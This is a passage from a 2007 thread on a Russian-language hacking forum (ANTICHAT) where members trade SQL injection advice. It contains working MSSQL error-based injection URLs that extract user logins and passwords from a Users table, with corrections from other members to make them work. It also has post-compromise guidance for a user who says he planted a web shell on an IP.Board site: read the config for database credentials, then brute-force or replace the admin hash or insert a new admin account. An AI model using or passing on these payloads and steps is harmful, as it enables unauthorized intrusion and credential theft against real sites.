ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ_OLD > Уязвимости
   
 
 
Опции темы Поиск в этой теме Опции просмотра

  #341  
Старый 25.11.2007, 13:49
fervex
Новичок
Регистрация: 12.11.2007
Сообщений: 25
Провел на форуме:
36633

Репутация: 3
По умолчанию

Цитата:
Сообщение от ShAnKaR  
в mysql по секурным соображениям нельзя так, вобщем выше написано.
что, UPDATE никак не получится корректно поставить в запрос? А где "выше написано"?
 

  #342  
Старый 25.11.2007, 13:55
0nep@t0p
Участник форума
Регистрация: 25.05.2007
Сообщений: 147
Провел на форуме:
2313429

Репутация: 728
По умолчанию

Цитата:
что, UPDATE никак не получится корректно поставить в запрос?
Не в этом дело, в mysql через инъекцию изменять информацию в БД нельзя
 

  #343  
Старый 26.11.2007, 00:48
delay(0)
Участник форума
Регистрация: 22.11.2006
Сообщений: 117
Провел на форуме:
1813343

Репутация: 141
По умолчанию

Код:
.asp?id=1+or+1=(SELECT+TOP+1+cast(UserLogin+as+nvarchar)%2B%27%3A%27%2Bcast(UserPassword+as+nvarchar)+from+Users)-
получаю
Цитата:
Microsoft OLE DB Provider for SQL Server error '80040e21'

Line 1: Incorrect syntax near 'cast'.
Что не так?
 

  #344  
Старый 26.11.2007, 01:25
+toxa+
[Лишённый самовыражени
Регистрация: 16.01.2005
Сообщений: 1,787
Провел на форуме:
9751379

Репутация: 3812


Отправить сообщение для +toxa+ с помощью ICQ Отправить сообщение для +toxa+ с помощью AIM
По умолчанию

Цитата:
Сообщение от fervex  
что, UPDATE никак не получится корректно поставить в запрос? А где "выше написано"?
не получится ибо в подзапросах тока select и после union тоже тока select
Цитата:
Сообщение от 0nep@t0p  
Не в этом дело, в mysql через инъекцию изменять информацию в БД нельзя
если инъекция в update, то мона, но это зависит от конкретных условий. Если всё удачно, то мона и файлы читать, и выводить всё чё те надо.
__________________
 

  #345  
Старый 26.11.2007, 01:42
Scipio
Members of Antichat - Level 5
Регистрация: 02.11.2006
Сообщений: 781
Провел на форуме:
5939734

Репутация: 1917


Отправить сообщение для Scipio с помощью ICQ
По умолчанию

Цитата:
Сообщение от delay(0)  
Код:
.asp?id=1+or+1=(SELECT+TOP+1+cast(UserLogin+as+nvarchar)%2B%27%3A%27%2Bcast(UserPassword+as+nvarchar)+from+Users)-
получаю

Что не так?
.
Код:
asp?id=1+or+1=(SELECT+TOP+1+cast(UserLogin+as+nvarchar)+':'+cast(UserPassword+as+nvarchar)+from+Users)--
непонял я для чего ты cast использовал, мож там кавычки %27 фильтруются, да и вобще, нах cast то надо?
если захотел как суперхеккер сделать то можно весь подзапрос в каст взять, но думаю это не обязательно в твоем случае
__________________
Карфаген должен быть разрушен...

Последний раз редактировалось Scipio; 26.11.2007 в 14:04..
 

  #346  
Старый 26.11.2007, 11:03
delay(0)
Участник форума
Регистрация: 22.11.2006
Сообщений: 117
Провел на форуме:
1813343

Репутация: 141
По умолчанию

Цитата:
если захотел как суперхеккер сделать
Я делал как дядя Cash прописал в своей статье.... Покажи тогда пример запроса.
 

  #347  
Старый 26.11.2007, 11:26
xaker-boss
Участник форума
Регистрация: 06.03.2007
Сообщений: 283
Провел на форуме:
1547094

Репутация: 120
Отправить сообщение для xaker-boss с помощью ICQ
По умолчанию

народ, я залил шел на IP.Board 2.2.2 © 2007 IPS, Inc. как теперь можно узнать пароль от админки??если можно и несложо обясните поподробние плиз
 

  #348  
Старый 26.11.2007, 11:36
ENFIX
Участник форума
Регистрация: 06.06.2006
Сообщений: 213
Провел на форуме:
1628290

Репутация: 474
Отправить сообщение для ENFIX с помощью ICQ
По умолчанию

смотришь когфиг, там пасс, юзер и адрес от БД.
Заходишь в эту бд. Смотришь таблтцу с юзверями
Ищешь админа - брутишь хэш.
Меньше мороки - просто меняешь хэш
А лучше - вставить новую запись
 

  #349  
Старый 26.11.2007, 11:40
Spyder
Members of Antichat - Level 5
Регистрация: 09.10.2006
Сообщений: 1,698
Провел на форуме:
9098076

Репутация: 4303


По умолчанию

ищи конфиг форума, там будет логин и пасс от СУБД, конектишься с этим пасом к базе и ищешь таблицу с юзерами
 

  #350  
Старый 26.11.2007, 13:16
Scipio
Members of Antichat - Level 5
Регистрация: 02.11.2006
Сообщений: 781
Провел на форуме:
5939734

Репутация: 1917


Отправить сообщение для Scipio с помощью ICQ
По умолчанию

Цитата:
Сообщение от delay(0)  
Я делал как дядя Cash прописал в своей статье.... Покажи тогда пример запроса.
Код:
asp?id=1+or+1=(SELECT+TOP+1+UserLogin%2bCHAR(58)%2bUserPassword+from+Users)--
ну как то так
__________________
Карфаген должен быть разрушен...
 
 





Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ